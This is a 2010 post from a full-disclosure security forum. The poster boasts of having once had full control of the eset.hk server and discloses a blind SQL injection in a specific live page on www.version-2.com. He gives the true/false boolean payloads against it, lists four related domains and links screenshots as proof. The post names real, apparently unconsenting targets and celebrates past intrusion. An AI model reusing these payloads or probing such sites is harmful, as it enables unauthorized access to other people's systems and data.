Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
eset[]hk again
Posted by: VMw4r3
Date: May 06, 2010 04:48PM

Tinc0de and me had full control of eset.hk server a while back and they "fixed" it.
I found another blind sqli in it,

1. www.version-2.com.hk
2. www.version-2.com.cn
3. www.eset.hk
4. www.version-2.com

www.version-2.com/ipevo/product/details_exp.php?fn=1 and 1=1 <--true

www.version-2.com/ipevo/product/details_exp.php?fn=1 and 1=2 <--false


http://img695.imageshack.us/img695/1425/ipevoxin6voip1273182004.png <--true

http://img15.imageshack.us/img15/3227/ipevoxin6voip1273182028.png <--false

Options: ReplyQuote

Sorry, only registered users may post in this forum.